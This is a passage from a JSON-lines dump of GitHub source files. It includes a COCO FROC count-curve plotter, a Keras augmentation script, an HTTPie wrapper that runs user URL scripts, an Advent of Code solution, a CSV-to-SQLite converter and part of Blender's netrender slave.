init_stats(gt, categories)\n\n gt_id_to_annotation = build_gt_id2annotations(gt)\n pr_id_to_annotation = build_pr_id2annotations(pr)\n\n stats = update_stats(\n stats, gt_id_to_annotation, pr_id_to_annotation,\n categories, weighted,\n )\n\n return stats\n\n\ndef calc_scores(stats, precision, recall):\n for category_id in stats:\n tp = stats[category_id]['TP']\n fp = stats[category_id]['FP']\n fn = stats[category_id]['FN']\n\n prec = tp / (tp + fp + 1e-7)\n rec = tp / (tp + fn + 1e-7)\n\n if precision.get(category_id, None) is None:\n precision[category_id] = []\n precision[category_id].append(prec)\n\n if recall.get(category_id, None) is None:\n recall[category_id] = []\n recall[category_id].append(rec)\n\n return precision, recall\n\n\ndef generate_count_curve(\n gt_ann,\n pr_ann,\n weighted=False,\n n_sample_points=50,\n plot_title='Count curve',\n plot_output_path='counts.png',\n test_ann=None,\n bounds=None,\n):\n precision = {}\n recall = {}\n\n for score_thres in tqdm(\n np.linspace(0.0, 1.0, n_sample_points, endpoint=False),\n ):\n stats = count_point(gt_ann, pr_ann, score_thres, weighted)\n precision, recall = calc_scores(stats, precision, recall)\n\n if plot_title:\n fig, ax = plt.subplots(figsize=[27, 18])\n ins = ax.inset_axes([0.05, 0.05, 0.45, 0.4])\n ins.set_xticks(\n [.7, .75, .8, .85, .9, .95],\n [.7, .75, .8, .85, .9, .95], fontsize=30,\n )\n ins.yaxis.tick_right()\n ins.xaxis.tick_top()\n if bounds is not None:\n _, x_max, _, _ = bounds\n ins.set_xlim([.8, x_max])\n else:\n ins.set_xlim([.8, 1.0])\n\n for category_id in precision:\n prec = precision[category_id]\n rec = recall[category_id]\n if plot_title:\n ax.plot(\n rec,\n prec,\n 'x--',\n label='AI ' + stats[category_id]['name'],\n )\n ins.plot(\n rec,\n prec,\n 'x--',\n label='AI ' + stats[category_id]['name'],\n )\n\n if test_ann is not None:\n for t_ann, c in zip(test_ann, COLORS):\n t_ann, label = t_ann\n t_pr = transform_gt_into_pr(t_ann, gt_ann)\n stats = count_point(gt_ann, t_pr, .5, weighted)\n _precision, _recall = calc_scores(stats, {}, {})\n if plot_title:\n ax.plot(\n _recall[category_id][0],\n _precision[category_id][0],\n 'D',\n markersize=15,\n markeredgewidth=3,\n label=label +\n f' (R = {np.round(_recall[category_id][0], 3)})',\n c=c,\n )\n ins.plot(\n _recall[category_id][0],\n _precision[category_id][0],\n 'D',\n markersize=12,\n markeredgewidth=2,\n label=label +\n f' (R = {np.round(_recall[category_id][0], 3)})',\n c=c,\n )\n ax.hlines(\n y=_precision[category_id][0],\n xmin=np.min(rec),\n xmax=np.max(rec),\n linestyles='dashed',\n colors=c,\n )\n ax.text(\n x=_recall[category_id][0], y=_precision[category_id][0],\n s=f' R = {np.round(_recall[category_id][0], 3)}',\n fontdict={'fontsize': 20, 'fontweight': 'bold'},\n )\n ins.hlines(\n y=_precision[category_id][0],\n xmin=np.min(rec),\n xmax=np.max(rec),\n linestyles='dashed',\n colors=c,\n )\n\n if plot_title:\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n ax.legend(\n loc='lower left', bbox_to_anchor=(.65, .1),\n fancybox=True, shadow=True, ncol=1, fontsize=30,\n )\n\n ax.set_title(plot_title, fontdict={'fontsize': 35})\n ax.set_ylabel(\n 'Precision', fontdict={\n 'fontsize': 30,\n },\n )\n ax.set_xlabel('Recall', fontdict={'fontsize': 30})\n\n ax.tick_params(axis='both', which='major', labelsize=30)\n ins.tick_params(axis='both', which='major', labelsize=20)\n\n if bounds is not None:\n x_min, x_max, _, _ = bounds\n ax.set_xlim([x_min, x_max])\n else:\n ax.set_xlim([.7, 1.0])\n ax.set_ylim(bottom=0.05, top=1.02)\n fig.tight_layout()\n fig.savefig(plot_output_path, dpi=150)\n else:\n return precision, recall\n", "repo_name": "qbeer/coco-froc-analysis", "sub_path": "coco_froc_analysis/count/count_curve.py", "file_name": "count_curve.py", "file_ext": "py", "file_size_in_byte": 5978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.load_json_from_file", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.load_json_from_file", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.update_scores", "line_number": 21, "usage_type": "call"}, {"api_name": "count_stats.init_stats", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.build_gt_id2annotations", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.build_pr_id2annotations", "line_number": 28, "usage_type": "call"}, {"api_name": "count_stats.update_stats", "line_number": 30, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.COLORS", "line_number": 110, "usage_type": "argument"}, {"api_name": "utils.transform_gt_into_pr", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 151, "usage_type": "call"}]} +{"seq_id": "4583903855", "text": "import keras.preprocessing.image\nfrom keras_preprocessing.image import ImageDataGenerator\nfrom skimage import io\n\n\ndata_gen = ImageDataGenerator (\n rotation_range =45 , #ratate between 0-45 degrees\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='constant',cval=125 #fills nearest remaining pixels with 125 with grey pixels\n\n)\n\nx = io.imread('mars_crater.jpg')\n\nx=x.reshape((1, )+ x.shape)\n\ni = 0\nfor batch in data_gen.flow(x, batch_size=16, #creates 16 images at once\n save_to_dir='imageAugm',\n save_prefix='aug',\n save_format='png'):\n i += 1\n if i > 20:\n break", "repo_name": "Sound245939/AICV", "sub_path": "data_aug.py", "file_name": "data_aug.py", "file_ext": "py", "file_size_in_byte": 724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "keras_preprocessing.image.ImageDataGenerator", "line_number": 6, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "70233801766", "text": "from pprint import pprint\nfrom time import sleep\nfrom typing import List, Union\nimport os\nimport sys\nimport configparser\nimport argparse\nimport logging\nimport shlex\nimport subprocess\n\nfrom httpie import core as httpie\n\n\n\n\ndef main(args: List[Union[str, bytes]] = sys.argv):\n module_dir = os.path.dirname(os.path.abspath(__file__))\n base_dir = os.getenv('HTTPIES_BASEDIR', False)\n args, urlscript_args = parse_args()\n log_level = args.verbose\n logging.basicConfig(format='%(levelname)s:%(message)s', level=log_level)\n\n if base_dir is False:\n logging.critical('$HTTPIES_BASEDIR not set, please add HTTPIES_BASEDIR to your environment variables.')\n sys.exit(-1)\n\n config = parse_config(module_dir, base_dir)\n\n props = merge_config(config, args)\n logging.debug(\"using base_dir: %s\" % props['base_dir'])\n\n pprint(props)\n\n if not os.path.isdir(props['base_dir']):\n logging.critical('- Base_dir \"%s\" does not exist, exiting' % props['base_dir'])\n sys.exit(-1)\n exec_props = find_executable(props, config)\n\n\n httpie_args = exec_url_script(exec_props, get_script_args(urlscript_args))\n logging.info(\"your url-script returned:\")\n logging.info(httpie_args.decode('utf-8'))\n\n\n if exec_props['watch'] is None:\n exit_status = exec_request(httpie_args)\n sys.exit(exit_status)\n else:\n while True:\n exec_request(httpie_args)\n print(f\"--Re-executing every {exec_props['watch']} seconds--\\n\")\n sleep(int(exec_props['watch']))\n\n\n\n\ndef parse_args():\n arg_parser = argparse.ArgumentParser(\n prog=\"httpies\",\n description=\"Script httie requests and execute them by url.\",\n epilog=\"Add \\\"param=value\\\" pairs to the command to pass arguments to you urls scripts (used for GET/POST values). \\n\"\n \"To UNSET a parameter that is set within your url script, use \\\"param=None\\\"\",\n usage=\"%(prog)s get.py /user/profile script_arg_1=value script_arg_2=value script_unset_value=None\"\n )\n\n arg_parser.add_argument('method', choices=['get', 'post', 'put', 'patch', 'delete'], help=\"Http request method\")\n arg_parser.add_argument('url', help=\"The url to request (ea. /user/profile)\")\n arg_parser.add_argument('-w', '--watch', help=\"Internal watch replacement, execute the command every [x] seconds untill killed\")\n arg_parser.add_argument('-c', '--config', help=\"Set config file to read\")\n arg_parser.add_argument('-b', '--basedir',\n help=\"Set the url script base dir, will overwrite config file and environment\")\n arg_parser.add_argument('-d', '--domain', help=\"Used to override the domain (ea. https://example.com)\")\n arg_parser.add_argument('-v', '--verbose',\n help=\"Set log-level (10=debug, 50=critical)\",\n type=int,\n default=logging.WARNING,\n choices=[logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR, logging.CRITICAL]\n )\n args, script_args = arg_parser.parse_known_args()\n return args, script_args\n\n\ndef parse_config(module_dir, base_dir):\n base_file = os.path.join(base_dir, 'httpies.conf')\n mod_file = os.path.join(module_dir, 'httpies.conf')\n if not os.path.isfile(base_file):\n logging.info(\n \"Reading config from %s, you can overwrite this by adding httpies.conf to your base_dir\" % mod_file\n )\n\n config = configparser.RawConfigParser()\n config.read([mod_file, base_file])\n return config\n\n\ndef merge_config(config, args):\n props = {\n \"base_dir\":os.getenv('HTTPIES_BASEDIR'),\n \"executable\": config.get('global', 'httpie_executable_name'),\n \"method\": args.method,\n \"domain\": args.domain if args.domain else os.getenv('HTTPIES_DEFAULT_DOMAIN',\n config.get('global', 'default_domain')\n ),\n \"url\": args.url,\n \"script_file\": None,\n \"verbose\": args.verbose,\n \"watch\": args.watch\n }\n if args.basedir:\n props['base_dir'] = os.path.realpath(args.basedir)\n\n url = props['url']\n if url[0] == '/':\n url = url[1:]\n\n props['script_file'] = os.path.join(props['base_dir'],\n config.get('global', 'url_script_dir'),\n url,\n props['method'].lower()\n )\n return props\n\n\ndef get_script_args(script_args):\n return_list = []\n dashes = '--'\n for arg in script_args:\n splitted = arg.split('=', 1)\n if len(splitted) == 2:\n return_list.append(\"%s=%s\" % (splitted[0], shlex.quote(splitted[1]),))\n else:\n return_list.append(\"%s%s\" % (dashes, shlex.quote(arg)))\n if dashes == '':\n dashes = '--'\n else:\n dashes = ''\n return return_list\n\n\ndef find_executable(props, config):\n logging.info(\"Looking for url-script: %s\" % props['script_file'])\n if os.path.isfile(props['script_file']):\n if not os.access(props['script_file'], os.X_OK):\n if config.get('global', 'chmod_url_scripts') == 'yes':\n logging.warning('Script file is not executable, running \"chmod 0777 %s\"' % props['script_file'])\n os.system('chmod 0755 %s' % props['script_file'])\n if not os.access(props['script_file'], os.X_OK):\n logging.critical('Script is not executable, exiting')\n sys.exit(-1)\n else:\n logging.critical('Script is not executable, exiting')\n sys.exit(-1)\n logging.info(\"Found: %s\" % props['script_file'])\n return props\n\n elements = dict(config.items('executables'))\n for ext, exe in elements.items():\n new_path = \"%s.%s\" % (props['script_file'], ext,)\n logging.debug('Trying: %s' % new_path)\n if os.path.isfile(new_path):\n props['exec_with'] = exe.replace('[HTTPIES_BASEDIR]', props['base_dir'])\n props['script_file'] = new_path\n logging.info(\"Found: %s\" % props['script_file'])\n return props\n\n logging.critical('- %s does not exist, exiting' % props['script_file'])\n sys.exit(-1)\n\ndef exec_url_script(props, script_args):\n command_list = [\n props['script_file'],\n '%s' % shlex.quote(props['method'].upper()),\n '\"%s\"' % shlex.quote(props['domain']),\n '\"%s\"' % shlex.quote(props['url'])\n\n ]\n if props['exec_with']:\n command_list.insert(0, props['exec_with'])\n\n command_list.extend(script_args)\n logging.info(\"Executing: %s\" % \" \".join(command_list))\n proc = subprocess.Popen(\" \".join(command_list), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \n stdout, stderr = proc.communicate()\n if len(stderr) > 0:\n logging.critical('%s : %s ' % (props['script_file'], stderr))\n if proc.returncode != 0:\n logging.critical('Url-script returned a non-zero exitcode, it returned \"%s\"', proc.returncode)\n logging.critical(\"tried to execute: %s\" % \" \".join(command_list))\n # I really just wanna dump the contents of the script... for debugging\n # @todo is this how we wanna do this.\n if props['verbose'] < 50:\n print(\"\\n DISABLE THIS MESSAGE using -v 50\")\n print(\"The stdout from your url-script was: \\n\")\n print(\"%s\" % stdout.decode(\"utf-8\"))\n print(\"The stderr from your url-script was: \\n\")\n print(\"%s\" % stderr.decode(\"utf-8\"))\n sys.exit(proc.returncode)\n\n return stdout\n\ndef exec_request(httpie_args):\n args = httpie_args.splitlines()\n args = [x.strip() for x in args]\n httpie.main(args)\n\n", "repo_name": "FlipVernooij/httpies", "sub_path": "httpies/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 8072, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.critical", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 53, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 77, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 78, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 88, "usage_type": "call"}, {"api_name": "configparser.RawConfigParser", "line_number": 92, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 99, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "shlex.quote", "line_number": 131, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 133, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 144, "usage_type": "call"}, {"api_name": "os.X_OK", "line_number": 144, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 146, "usage_type": "call"}, {"api_name": "os.system", "line_number": 147, "usage_type": "call"}, {"api_name": "os.access", "line_number": 148, "usage_type": "call"}, {"api_name": "os.X_OK", "line_number": 148, "usage_type": "attribute"}, {"api_name": "logging.critical", "line_number": 149, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 150, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 153, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 154, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 164, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 167, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 168, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 173, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 174, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 175, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 182, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 183, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 183, "usage_type": "attribute"}, {"api_name": "logging.critical", "line_number": 187, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 189, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 190, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 199, "usage_type": "call"}, {"api_name": "httpie.core.main", "line_number": 206, "usage_type": "call"}, {"api_name": "httpie.core", "line_number": 206, "usage_type": "name"}]} +{"seq_id": "27262056456", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@author: wapisani\n\"\"\"\n\nimport os\nimport numpy as np\nfrom collections import Counter\n\ndirectory = r'F:\\Documents\\Programming\\AoC\\2021'\nos.chdir(directory)\n\nwith open('input_day3.txt','r') as handle:\n data = handle.readlines()\n\n# Test data\n# data = ['00100','11110','10110','10111','10101','01111','00111','11100','10000','11001','00010','01010']\n\ndata = [line.strip() for line in data]\n# Store bits in array so that they're easily accessed later\nrows, cols = len(data), len(data[0])\nstorage_array = np.zeros((rows,cols))\nfor i,line in enumerate(data):\n for j,bit in enumerate(line):\n bit = int(bit)\n storage_array[i,j] = bit\n\n### Part 1 ###\ngamma = ''\nepsilon = ''\ncommon_bits = ''\nfor col in range(cols):\n count = Counter(storage_array[:,col])\n zero_count = count[0.0]\n one_count = count[1.0]\n \n if zero_count > one_count:\n gamma += '0'\n epsilon += '1'\n common_bits += '0'\n elif one_count > zero_count:\n gamma += '1'\n epsilon += '0'\n common_bits += '1'\n else:\n common_bits += '='\n \n \nprint(f'Power consumption is {int(gamma,2)*int(epsilon,2)}')\n \n### Part 2 ###\n# Check for oxygen generator rating\ndef CheckCommonality(lines,col):\n \"\"\"\n This function will check for the commonality of 1's vs 0's for a list\n of lines (given as lines) for a specific column position (given as col)\n and return which is greater or if they're equal.\n\n Parameters\n ----------\n lines : list\n list of strings of binary numbers.\n col : int\n column position.\n\n Returns\n -------\n '1', '0', or '='.\n\n \"\"\"\n rows, cols = len(lines), len(lines[0])\n storage_array = np.zeros((rows,cols))\n for i,line in enumerate(lines):\n for j,bit in enumerate(line):\n bit = int(bit)\n storage_array[i,j] = bit\n \n count = Counter(storage_array[:,col])\n zero_count = count[0.0]\n one_count = count[1.0]\n \n if zero_count > one_count:\n return '0'\n \n elif one_count > zero_count:\n return '1'\n \n else:\n return '='\n \ndata_o2 = data[:]\nfor col in range(cols):\n if col > 0:\n more_common = CheckCommonality(data_o2, col)\n else:\n more_common = common_bits[col]\n if len(data_o2) == 1:\n break\n \n for line in data:\n if line not in data_o2:\n continue\n bit = line[col]\n if more_common == '=':\n if bit != '1':\n data_o2.remove(line)\n continue\n else:\n if bit != more_common:\n data_o2.remove(line)\n continue\no2 = int(data_o2[0],2)\n\ndata_co2 = data[:]\nfor col in range(cols):\n if col > 0:\n more_common = CheckCommonality(data_co2, col)\n else:\n more_common = common_bits[col]\n if len(data_co2) == 1:\n break\n \n for line in data:\n if line not in data_co2:\n continue\n bit = line[col]\n if more_common == '=':\n if bit != '0':\n data_co2.remove(line)\n continue\n else:\n if bit == more_common:\n data_co2.remove(line)\n continue\nco2 = int(data_co2[0],2)\n\nprint(f'Life support rating is {co2*o2}')\n", "repo_name": "wapisani/AoC", "sub_path": "2021/day3.py", "file_name": "day3.py", "file_ext": "py", "file_size_in_byte": 3311, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "73178097445", "text": "import csv\r\nimport io\r\nimport pathlib\r\nimport sqlite3\r\nimport tkinter.filedialog\r\nfrom tkinter import Tk\r\n\r\n\r\ndef show_file_opener_dialog():\r\n tk = Tk()\r\n tk.withdraw()\r\n return tkinter.filedialog.Open(tk,\r\n title=\"Choose the file to convert\",\r\n filetypes=[('CSV files', '.csv')]).show()\r\n\r\n\r\ndef show_save_as_dialog():\r\n tk = Tk()\r\n tk.withdraw()\r\n return tkinter.filedialog.SaveAs(tk,\r\n title=\"Choose the name of the converted file\",\r\n filetypes=[('SQL DB file', '.db')],\r\n defaultextension=\"db\").show()\r\n\r\n\r\ndef process_file(csv_path, db_path):\r\n with open(csv_path, mode='r', encoding='utf8') as reader:\r\n csv_reader = csv.reader(reader)\r\n first_row_read = False\r\n connection = sqlite3.connect(db_path)\r\n\r\n print('Starting...')\r\n for row in csv_reader:\r\n if not first_row_read:\r\n table_name = pathlib.Path(csv_path).name.split(\".\")[0]\r\n stringio = io.StringIO()\r\n for column in row:\r\n stringio.write(f'{column} TEXT, ')\r\n column_statement = stringio.getvalue().rstrip(', ')\r\n connection.execute(f'DROP TABLE IF EXISTS {table_name}')\r\n connection.execute(f'CREATE TABLE {table_name} ({column_statement})')\r\n first_row_read = True\r\n stringio.close()\r\n else:\r\n for i in range(0, len(row)):\r\n row[i] = f\"'{row[i]}'\"\r\n row_values = ', '.join(row)\r\n connection.execute(f'INSERT INTO {table_name} VALUES ({row_values})')\r\n\r\n print('Wrapping up...')\r\n connection.commit()\r\n print('Finished!')\r\n connection.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n process_file(show_file_opener_dialog(), show_save_as_dialog())\r\n", "repo_name": "asaiahdev777/CSV2SQLite", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Tk", "line_number": 10, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog.Open", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog", "line_number": 12, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog.SaveAs", "line_number": 20, "usage_type": "call"}, {"api_name": "tkinter.filedialog.filedialog", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog", "line_number": 20, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 35, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "72248308645", "text": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport sys, os, platform, shutil\nimport http, http.client, http.server\nimport subprocess, time\nimport json\n\nimport bpy\n\nfrom netrender.utils import *\nimport netrender.model\nimport netrender.repath\nimport netrender.thumbnail as thumbnail\n\nBLENDER_PATH = sys.argv[0]\n\nCANCEL_POLL_SPEED = 2\nMAX_TIMEOUT = 10\nINCREMENT_TIMEOUT = 1\nMAX_CONNECT_TRY = 10\ntry:\n system = platform.system()\nexcept UnicodeDecodeError:\n import sys\n system = sys.platform\n\nif system in ('Windows', 'win32') and platform.version() >= '5': # Error mode is only available on Win2k or higher, that's version 5\n import ctypes\n def SetErrorMode():\n val = ctypes.windll.kernel32.SetErrorMode(0x0002)\n ctypes.windll.kernel32.SetErrorMode(val | 0x0002)\n return val\n\n def RestoreErrorMode(val):\n ctypes.windll.kernel32.SetErrorMode(val)\nelse:\n def SetErrorMode():\n return 0\n\n def RestoreErrorMode(val):\n pass\n\ndef clearSlave(path):\n shutil.rmtree(path)\n\ndef slave_Info():\n sysname, nodename, release, version, machine, processor = platform.uname()\n slave = netrender.model.RenderSlave()\n slave.name = nodename\n slave.stats = sysname + \" \" + release + \" \" + machine + \" \" + processor\n return slave\n\ndef testCancel(conn, job_id, frame_number):\n conn.request(\"HEAD\", \"/status\", headers={\"job-id\":job_id, \"job-frame\": str(frame_number)})\n\n # canceled if job isn't found anymore\n if responseStatus(conn) == http.client.NO_CONTENT:\n return True\n else:\n return False\n\ndef testFile(conn, job_id, slave_id, rfile, JOB_PREFIX, main_path = None):\n job_full_path = prefixPath(JOB_PREFIX, rfile.filepath, main_path)\n \n found = os.path.exists(job_full_path)\n \n if found and rfile.signature != None:\n found_signature = hashFile(job_full_path)\n found = found_signature == rfile.signature\n \n if not found:\n print(\"Found file %s at %s but signature mismatch!\" % (rfile.filepath, job_full_path))\n os.remove(job_full_path)\n job_full_path = prefixPath(JOB_PREFIX, rfile.filepath, main_path, force = True)\n\n if not found:\n # Force prefix path if not found\n job_full_path = prefixPath(JOB_PREFIX, rfile.filepath, main_path, force = True)\n temp_path = os.path.join(JOB_PREFIX, \"slave.temp\")\n conn.request(\"GET\", fileURL(job_id, rfile.index), headers={\"slave-id\":slave_id})\n response = conn.getresponse()\n\n if response.status != http.client.OK:\n return None # file for job not returned by server, need to return an error code to server\n\n f = open(temp_path, \"wb\")\n buf = response.read(1024)\n\n while buf:\n f.write(buf)\n buf = response.read(1024)\n\n f.close()\n\n os.renames(temp_path, job_full_path)\n \n rfile.filepath = job_full_path\n\n return job_full_path\n\ndef breakable_timeout(timeout):\n for i in range(timeout):\n time.sleep(1)\n if engine.test_break():\n break\n\ndef render_slave(engine, netsettings, threads):\n # timeout = 1 # UNUSED\n \n bisleep = BreakableIncrementedSleep(INCREMENT_TIMEOUT, 1, MAX_TIMEOUT, engine.test_break)\n\n engine.update_stats(\"\", \"Network render node initiation\")\n \n slave_path = bpy.path.abspath(netsettings.path)\n\n if not os.path.exists(slave_path):\n print(\"Slave working path ( %s ) doesn't exist\" % netsettings.path)\n return\n\n if not os.access(slave_path, os.W_OK):\n print(\"Slave working path ( %s ) is not writable\" % netsettings.path)\n return\n\n conn = clientConnection(netsettings.server_address, netsettings.server_port)\n \n if not conn:\n # timeout = 1 # UNUSED\n print(\"Connection failed, will try connecting again at most %i times\" % MAX_CONNECT_TRY)\n bisleep.reset()\n \n for i in range(MAX_CONNECT_TRY):\n bisleep.sleep()\n \n conn = clientConnection(netsettings.server_address, netsettings.server_port)\n \n if conn or engine.test_break():\n break\n \n print(\"Retry %i failed, waiting %is before retrying\" % (i + 1, bisleep.current))\n \n if conn:\n conn.request(\"POST\", \"/slave\", json.dumps(slave_Info().serialize()))\n response = conn.getresponse()\n response.read()\n\n slave_id = response.getheader(\"slave-id\")\n\n NODE_PREFIX = os.path.join(slave_path, \"slave_\" + slave_id)\n if not os.path.exists(NODE_PREFIX):\n os.mkdir(NODE_PREFIX)\n\n engine.update_stats(\"\", \"Network render connected to master, waiting for jobs\")\n\n while not engine.test_break():\n conn.request(\"GET\", \"/job\", headers={\"slave-id\":slave_id})\n response = conn.getresponse()\n\n if response.status == http.client.OK:\n bisleep.reset()\n\n job = netrender.model.RenderJob.materialize(json.loads(str(response.read(), encoding='utf8')))\n engine.update_stats(\"\", \"Network render processing job from master\")\n\n JOB_PREFIX = os.path.join(NODE_PREFIX, \"job_\" + job.id)\n if not os.path.exists(JOB_PREFIX):\n os.mkdir(JOB_PREFIX)\n\n # set tempdir for fsaa temp files\n # have to set environ var because render is done in a subprocess and that's the easiest way to propagate the setting\n os.environ[\"TMP\"] = JOB_PREFIX\n\n\n if job.type == netrender.model.JOB_BLENDER:\n job_path = job.files[0].filepath # path of main file\n main_path, main_file = os.path.split(job_path)\n\n job_full_path = testFile(conn, job.id, slave_id, job.files[0], JOB_PREFIX)\n print(\"Fullpath\", job_full_path)\n 